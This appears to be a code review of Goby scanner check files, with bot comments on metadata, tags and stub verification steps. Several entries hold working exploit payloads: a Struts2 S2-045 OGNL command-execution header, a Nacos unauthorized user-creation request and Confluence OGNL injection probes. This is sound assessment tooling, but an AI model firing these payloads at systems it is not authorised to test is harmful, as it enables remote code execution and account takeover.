"https://gobies.org/"
"Description": "",
"Product": "Active UC",
"Homepage": "http://www.iactive.com.cn/",
"Author": "",
"Impact": "Active UC index.action has a RCE vulnerability.",
"Recommendation": "update",
"References": [],
"HasExp": true,
"ExpParams": [
{
"Name": "cmd",
"Type": "input",
"Value": "whoami"
}
],
"HasExp": true,
"ExpParams": [
{
"name": "Cmd",
"type": "input",
"value": "whoami",
"show": ""
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -41,7 +42,7 @@
"Pragma": "no-cache"
},
"data_type": "text",
"data": "-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170"
"data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170"
},
"ResponseTest": {
"type": "group",
@ -59,7 +60,7 @@
"SetVariable": []
}
],
"ExploitSteps": [
"ExploitSteps": [
"AND",
{
"Request": {
@ -72,12 +73,12 @@
"Connection": "close",
"Cookie": "SessionId=96F3F15432E0660E0654B1CE240C4C36",
"Charsert": "UTF-8",
"Content-Type": "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{Cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170",
"Content-Type": "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='{{{cmd}}}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}; boundary=---------------------------18012721719170",
"Cache-Control": "no-cache",
"Pragma": "no-cache"
},
"data_type": "text",
"data": "-----------------------------18012721719170\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\nContent-Type: text/plain\n-----------------------------18012721719170"
"data": "-----------------------------18012721719170\r\nContent-Disposition: form-data; name=\"pocfile\"; filename=\"text.txt\"\r\nContent-Type: text/plain\r\n-----------------------------18012721719170"
},
"ResponseTest": {
"type": "group",
@ -93,10 +94,10 @@
]
},
"SetVariable": [
"output|lastbody"
]
"output|lastbody|undefined|undefined"
]
}
],
"PostTime": "2021-06-28 10:08:54",
"GobyVersion": "1.8.268"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}
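Review bot: The rewritten metadata drops the root cause: the earlier description attributes the issue to Struts2 S2-045, while the new text only says `"Active UC index.action has a RCE vulnerability."` with `"Description": ""`. Without the S2-045 identifier a defender cannot map a finding to the framework patch, and `"Recommendation": "update"` does not say what to update. Suggest `"Description": "Active UC index.action is affected by the Struts2 S2-045 remote command execution vulnerability."` and a recommendation that names the Struts2 upgrade. The `SetVariable` value `"output|lastbody|undefined|undefined"` looks like unset converter fields serialised as text and should be checked against the consumer's expected format.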


@ -2,39 +2,38 @@
"Name": "Alibaba Nacos Add user not authorized",
"Level": "2",
"Tags": [
"Ultra vires"
"unauthorized"
],
"GobyQuery": "title==\"Nacos\"",
"Description": "On December 29, 2020, the Nacos official disclosed in the issue released by GitHub that there is an unauthorized access vulnerability in Alibaba Nacos due to improper handling of user agent. Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.",
"GobyQuery": "title=\"Nacos\"",
"Description": "Alibaba Nacos is an easy-to-use platform designed for dynamic service discovery and configuration and service management. It helps you to build cloud native applications and microservices platform easily.",
"Product": "Alibaba Nacos",
"Homepage": "https://github.com/alibaba/nacos",
"Author": "PeiQi",
"Impact": "<p>Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.<br></p>",
"Recommandation": "<p>Upgrade version<br></p>",
"References": [
"http://wiki.peiqi.tech"
],
"Author": "",
"Impact": "On December 29, 2020, the Nacos official disclosed in the issue released by GitHub that there is an unauthorized access vulnerability in Alibaba Nacos due to improper handling of user agent. Through this vulnerability, the attacker can perform arbitrary operations, including creating a new user and performing post login operations.",
"Recommendation": "update",
"References": [],
"HasExp": true,
"ExpParams": [
{
"name": "User",
"type": "input",
"value": "PeiQi",
"show": ""
},
{
"name": "Pass",
"type": "input",
"value": "PeiQi",
"show": ""
},
{
"name": "Dir",
"type": "select",
"value": "/v1/auth/users,/nacos/v1/auth/users",
"show": ""
}
],
"ExpParams": [
{
"Name": "User",
"Type": "input",
"Value": "test"
},
{
"Name": "Pass",
"Type": "input",
"Value": "test"
},
{
"Name": "Dir",
"Type": "select",
"Value": "/v1/auth/users,/nacos/v1/auth/users"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"OR",
{
@ -90,7 +89,7 @@
"SetVariable": []
}
],
"ExploitSteps": [
"ExploitSteps": [
"AND",
{
"Request": {
@ -103,7 +102,7 @@
"data_type": "text",
"data": "username={{{User}}}&password={{{Pass}}}"
},
"ResponseTest": {
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
@ -117,10 +116,10 @@
]
},
"SetVariable": [
"output|lastbody"
]
"output|lastbody|undefined|undefined"
]
}
],
"PostTime": "2021-04-04 19:56:49",
"GobyVersion": "1.8.255"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}
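Review bot: `GobyQuery` changes from `title==\"Nacos\"` to `title=\"Nacos\"`, which, if `==` is the exact-match operator as in FOFA-style syntax, widens the asset selection to any title containing "Nacos" and will raise false positives; keep `"GobyQuery": "title==\"Nacos\""` unless the broader match is intended. The Alibaba Nacos Default Password section makes the same change. Separately, the default `User`/`Pass` values become `test`/`test`, so an authorised check that runs the exploit step leaves an account with a guessable password on the assessed system. The empty `ExpTips` added here is the place to record that, e.g. `"Content": "Creates a real account; remove it after verification"`.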


@ -1,19 +1,23 @@
{
"Name": "Alibaba Nacos Default password",
"Name": "Alibaba Nacos Default Password",
"Level": "1",
"Tags": [
"Default password"
"Default Password"
],
"GobyQuery": "title==\"Nacos\"",
"Description": "There is a default weak password Nacos/Nacos in the Alibaba Nacos console. You can log in to the background to view sensitive information (nacos/naocs)",
"GobyQuery": "title=\"Nacos\"",
"Description": "Alibaba Nacos is an easy-to-use platform designed for dynamic service discovery and configuration and service management. It helps you to build cloud native applications and microservices platform easily.",
"Product": "Alibaba Nacos",
"Homepage": "https://github.com/alibaba/nacos",
"Author": "PeiQi",
"Impact": "<p>Log in to the background to view sensitive information<br></p>",
"Recommandation": "<p>Upgrade version</p>",
"References": [
"http://wiki.peiqi.tech"
],
"Author": "",
"Impact": "There is a default weak password Nacos/Nacos in the Alibaba Nacos console. You can login to the background to view sensitive information (nacos/naocs).",
"Recommendation": "",
"References": [],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"OR",
{
@ -71,6 +75,43 @@
"SetVariable": []
}
],
"PostTime": "2021-04-04 18:56:41",
"GobyVersion": "1.8.255"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}
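Review bot: The `ExploitSteps` block added at the end of this file is a template stub that requests `/test.php` and passes when the body contains `test`, which has nothing to do with the default-password check described in `Impact`, while the file still advertises `"HasExp": true`. A user who runs the verification gets a result that depends only on whether the host happens to serve such a page, so the finding can be falsely confirmed or falsely cleared. Until a real verification step exists, leave `ExploitSteps` out and set `"HasExp": false`. The same stub is added in the Apache Airflow, Apache Kylin default-password, ClickHouse, Consul, DedeCMS, Discuz (three files) and Docker Registry sections below, and in most of them `HasExp` appears to flip from `false` to `true` at the same time.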


@ -1,18 +1,18 @@
{
"Name": "Apache Airflow Unauthorized",
"Level": "3",
"Level": "2",
"Tags": [
"Unauthorized"
],
"GobyQuery": "app=\"APACHE-Airflow\"",
"Description": "remote attacker to gain unauthorized access to a targeted system",
"Description": "Airflow is a platform created by the community to programmatically author, schedule and monitor workflows.",
"Product": "APACHE-Airflow",
"Homepage": "https://airflow.apache.org/",
"Author": "aetkrad",
"Impact": "<p>This allowed unauthenticated users to hit that endpoint to add/modify Airflow variables used in DAGs<br></p>",
"Recommendation": "",
"Author": "",
"Impact": "Acunetix determined that it was possible to access Airflow Web interface without authentication. Airflow is designed to be accessed by trusted clients inside trusted environments. It's not recommended to have it publicly accessible.",
"Recommendation": "Restrict public access and upgrade to the latest version of Airflow.",
"References": [],
"HasExp": false,
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
@ -62,6 +62,43 @@
]
}
],
"PostTime": "2021-10-31 15:32:53",
"GobyVersion": "1.8.302"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}


@ -1,19 +1,23 @@
{
"Name": "Apache Kylin Console Default password",
"Name": "Apache Kylin Console default password",
"Level": "1",
"Tags": [
"Default password"
],
"GobyQuery": "app=\"APACHE-kylin\"",
"Description": "Apache kylin console has a default weak password of admin/KYLIN, which can be further exploited by login console",
"Description": "Apache Kylin™ is an open source, distributed Analytical Data Warehouse for Big Data; it was designed to provide OLAP (Online Analytical Processing) capability in the big data era. By renovating the multi-dimensional cube and precalculation technology on Hadoop and Spark, Kylin is able to achieve near constant query speed regardless of the ever-growing data volume. Reducing query latency from minutes to sub-second, Kylin brings online analytics back to big data.",
"Product": "Apache Kylin",
"Homepage": "http://kylin.apache.org/",
"Author": "PeiQi",
"Impact": "<p>The attacker will log into the background as an administrator to further attack</p>",
"Recommandation": "<p>undefined</p>",
"References": [
"http://wiki.peiqi.tech"
],
"Author": "",
"Impact": "Apache kylin console has a default weak password of admin/KYLIN, which can be further exploited by login console.",
"Recommendation": "",
"References": [],
"HasExp": true,
"ExpParams": null,
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -51,6 +55,43 @@
"SetVariable": []
}
],
"PostTime": "2021-04-04 15:51:21",
"GobyVersion": "1.8.255"
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/test.php",
"follow_redirect": true,
"header": null,
"data_type": "text",
"data": "",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "test",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
}
],
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}
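Review bot: `"Recommendation": ""` leaves a default-credential finding with no remediation, even though the `Impact` text names the default `admin/KYLIN` account. A report generated from this entry tells the operator what is wrong but not what to do, so I would fill it in, for example `"Recommendation": "Change the default admin password and restrict access to the Kylin console to trusted networks."`. The Alibaba Nacos default-password section above has the same empty field.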


@ -1,28 +1,31 @@
{
"Name": "Apache Kylin Unauthorized configuration disclosure (CVE-2020-13937)",
"Level": "0",
"Name": "Apache Kylin API Unauthorized Access CVE-2020-13937",
"Level": "1",
"Tags": [
"Disclosure of Sensitive Information"
"unauthorized"
],
"GobyQuery": "app=\"APACHE-kylin\"",
"Description": "Apache kylin has a restful API that exposes configuration information without authorization.\nAttackers can use this vulnerability to obtain sensitive information of the system.",
"Description": "Apache Kylin™ is an open source, distributed Analytical Data Warehouse for Big Data; it was designed to provide OLAP (Online Analytical Processing) capability in the big data era. By renovating the multi-dimensional cube and precalculation technology on Hadoop and Spark, Kylin is able to achieve near constant query speed regardless of the ever-growing data volume. Reducing query latency from minutes to sub-second, Kylin brings online analytics back to big data.",
"Product": "Apache kylin",
"Homepage": "http://kylin.apache.org/",
"Author": "PeiQi",
"Impact": "<p>Attackers can use this vulnerability to obtain sensitive information of the system.<br></p>",
"Recommandation": "<p>Upgrade to the safe version, or perform the following mitigation measures:</p><p>Edit \"$kylin\"_ HOME/WEB-INF/classes/ kylinSecurity.xml \"</p><p>Delete the following line \"&lt; scr:intercept-url pattern= \"/api/admin/config\" access=\"permitAll\"/&gt;\"</p><p>Restart the kylin instance to take effect.</p>",
"Author": "",
"Impact": "Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed Kylin's configuration information without any authentication, so it is dangerous because some confidential information entries will be disclosed to everyone.",
"Recommendation": "update",
"References": [
"http://wiki.peiqi.tech"
"https://nvd.nist.gov/vuln/detail/CVE-2020-13937"
],
"HasExp": true,
"ExpParams": [
{
"name": "Config",
"type": "select",
"value": "/kylin/api/admin/config",
"show": ""
}
],
"HasExp": true,
"ExpParams": [
{
"Name": "Config",
"Type": "select",
"Value": "/kylin/api/admin/config"
}
],
"ExpTips": {
"Type": "",
"Content": ""
},
"ScanSteps": [
"AND",
{
@ -30,7 +33,7 @@
"method": "GET",
"uri": "/kylin/api/admin/config",
"follow_redirect": true,
"header": {},
"header": null,
"data_type": "text",
"data": ""
},
@ -57,18 +60,18 @@
"SetVariable": []
}
],
"ExploitSteps": [
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/kylin/api/admin/config",
"follow_redirect": true,
"header": {},
"header": null,
"data_type": "text",
"data": ""
},
"ResponseTest": {
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
@ -89,10 +92,10 @@
]
},
"SetVariable": [
"output|lastbody"
]
"output|lastbody|undefined|undefined"
]
}
],
"PostTime": "2021-04-04 15:55:28",
"GobyVersion": "1.8.255"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}
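Review bot: The new `"Recommendation": "update"` appears to drop the interim mitigation that the earlier `Recommandation` text carried, namely removing the `permitAll` intercept-url entry for `/api/admin/config` from `kylinSecurity.xml` and restarting the instance. Operators who cannot upgrade immediately are left with nothing actionable, and "update" does not say which release fixes the issue. Keep the upgrade advice, add the fixed version from the NVD reference already listed under `References`, and carry the configuration workaround over into the correctly spelled `Recommendation` key.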


@ -5,11 +5,11 @@
"infoleak"
],
"GobyQuery": "app=\"ASPCMS\"",
"Description": "aspcms /plug/oem/AspCms_OEMFun.asp leak backend url",
"Description": "aspCMS is a module based ASP Content Management System (CMS).",
"Product": "ASPCMS",
"Homepage": "https://gobies.org/",
"Author": "aetkrad",
"Impact": "<p>leak backend url<br></p>",
"Homepage": "",
"Author": "",
"Impact": "aspcms /plug/oem/AspCms_OEMFun.asp leak backend url.",
"Recommendation": "",
"References": [],
"HasExp": true,
@ -126,6 +126,6 @@
]
}
],
"PostTime": "2021-11-02 20:50:45",
"GobyVersion": "1.8.302"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}
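Review bot: `"PostTime": "0000-00-00 00:00:00"` and `"GobyVersion": "0.0.0"` in the last hunk appear to replace real values (`2021-11-02 20:50:45`, `1.8.302`) with sentinels, and the first hunk blanks `Author` and `Homepage`. The zero timestamp is not a valid calendar date, so a consumer that parses `PostTime` will reject it or sort it wrongly, and the entry loses the provenance a reviewer needs to judge how old the check is and where it came from. Keep the original values, or if they are truly unknown omit the keys or use `null` rather than a fake date and version. The same zeroing is applied at the end of every other file section visible on this page.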


@ -1,25 +1,32 @@
{
"Name": "Atlassian Confluence OGNL injection CVE-2021-26084",
"Name": "Atlassian Confluence OGNL Injection CVE-2021-26084",
"Level": "3",
"Tags": [
"rce"
"sqli"
],
"GobyQuery": "app=\"Confluence\"",
"Description": "Confluence is Atlassian's professional enterprise knowledge management and collaboration software, which can also be used to build enterprise wikis. Therefore, Confluence is widely used. In some cases, unauthorized attackers can construct special requests that cause remote code execution.",
"GobyQuery": "app=\"Confluence\" || product=\"Confluence\" || company=\"Atlassian\"",
"Description": "Confluence is Atlassian's professional enterprise knowledge management and collaboration software, which can also be used to build enterprise wikis.",
"Product": "Atlassian Confluence",
"Homepage": "https://www.atlassian.com",
"Author": "luckying1314@139.com",
"Impact": "<p>An OGNL injection vulnerability exists that would allow an authenticated user, and in some instances unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.<br></p>",
"Recommendation": "<p>General repair suggestions:</p><p>Check and upgrade to the secure version based on the information in the affected version. The official download link is <a href>https://www.atlassian.com/software/confluence/download-archives</a></p><p>Temporary repair suggestions:</p><p>If you are not ready to update the Confluence, please refer to the official notification calling for Mitigation for Linux and Windows operating systems.<a href>https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html</a></p>",
"Author": "",
"Impact": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.",
"Recommendation": "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html",
"References": [
"https://github.com/alt3kx/CVE-2021-26084_PoC"
"https://nvd.nist.gov/vuln/detail/CVE-2021-26084",
"https://jira.atlassian.com/browse/CONFSERVER-67940",
"https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html"
],
"HasExp": true,
"ExpParams": [
{
"Name": "command",
"Name": "Command",
"Type": "input",
"Value": "whoami"
},
{
"Name": "Path",
"Type": "select",
"Value": "/pages/createpage-entervariables.action?SpaceKey=x,/pages/createpage-entervariables.action,/confluence/pages/createpage-entervariables.action?SpaceKey=x,/confluence/pages/createpage-entervariables.action,/wiki/pages/createpage-entervariables.action?SpaceKey=x,/wiki/pages/createpage-entervariables.action,/pages/doenterpagevariables.action,/pages/createpage.action?spaceKey=myproj,/pages/templates2/viewpagetemplate.action,/pages/createpage-entervariables.action,/template/custom/content-editor,/templates/editor-preload-container,/users/user-dark-features"
}
],
"ExpTips": {
@ -27,7 +34,7 @@
"Content": ""
},
"ScanSteps": [
"AND",
"OR",
{
"Request": {
"method": "POST",
@ -37,12 +44,8 @@
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaaaaaa%5Cu0027%2B%7B{{{r1}}}%2B{{{r2}}}%7D%2B%5Cu0027",
"set_variable": [
"r1|rand|int|8",
"r2|rand|int|7",
"r4|r1|add|r2"
]
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
@ -59,14 +62,420 @@
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "{{{r4}}}",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody|regex|"
]
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/pages/createpage-entervariables.action",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/confluence/pages/createpage-entervariables.action?SpaceKey=x",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/confluence/pages/createpage-entervariables.action",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/wiki/pages/createpage-entervariables.action?SpaceKey=x",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/wiki/pages/createpage-entervariables.action",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/pages/doenterpagevariables.action",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/pages/createpage.action?spaceKey=myproj",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/pages/templates2/viewpagetemplate.action",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/pages/createpage-entervariables.action",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/template/custom/content-editor",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/templates/editor-preload-container",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": []
},
{
"Request": {
"method": "POST",
"uri": "/users/user-dark-features",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
},
"data_type": "text",
"data": "queryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb",
"set_variable": []
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "value=\"aaaa{140592=null}",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
@ -74,7 +483,7 @@
{
"Request": {
"method": "POST",
"uri": "/pages/createpage-entervariables.action?SpaceKey=x",
"uri": "{{{Path}}}",
"follow_redirect": true,
"header": {
"Content-Type": "application/x-www-form-urlencoded"
@ -101,6 +510,6 @@
]
}
],
"PostTime": "2021-09-03 11:27:04",
"GobyVersion": "1.8.300"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}
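Review bot: The tag appears to change from `"rce"` to `"sqli"`, which contradicts both the entry name (OGNL injection) and the new `Impact` text, which says the flaw lets an attacker "execute arbitrary code". Anything that triages, filters or reports findings by tag will file a code-execution issue under SQL injection, so restore `"Tags": ["rce"]`. Separately, the expanded `ScanSteps` list contains the URI `/pages/createpage-entervariables.action` twice, so one of those steps is a redundant request against every scanned host and can be dropped. The `ScanSteps` and `ExploitSteps` arrays are only partly visible across the hunks, so the first step's URI could not be checked.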


@ -4,12 +4,12 @@
"Tags": [
"getshell"
],
"GobyQuery": "(app=\"cacti-监控系统\"|title=\"Login to Cacti\"|app=\"Cactiez\")",
"Description": "allows remote attackers to upload and execute arbitrary files",
"Product": "cacti-监控系统",
"GobyQuery": "app=\"cacti-监控系统\" || title=\"Login to Cacti\" || app=\"Cactiez\"",
"Description": "Cacti provides a robust and extensible operational monitoring and fault management framework for users around the world. Is also a complete network graphing solution designed to harness the power of RRDTool's data storage and graphing functionality.",
"Product": "cacti",
"Homepage": "https://www.cacti.net/",
"Author": "aetkrad",
"Impact": "<p>Remote attacker can use to replace web application files with malicious code and perform remote code execution on the system.<br></p>",
"Author": "",
"Impact": "Remote attacker can use to replace web application files with malicious code and perform remote code execution on the system.",
"Recommendation": "",
"References": [],
"HasExp": true,
@ -121,6 +121,6 @@
]
}
],
"PostTime": "2021-11-05 13:30:24",
"GobyVersion": "1.8.302"
"PostTime": "0000-00-00 00:00:00",
"GobyVersion": "0.0.0"
}


@ -4,17 +4,17 @@
"Tags": [
"sqli"
],
"GobyQuery": "(banner=\"X-Clickhouse-Summary\" | port=\"8123\")",
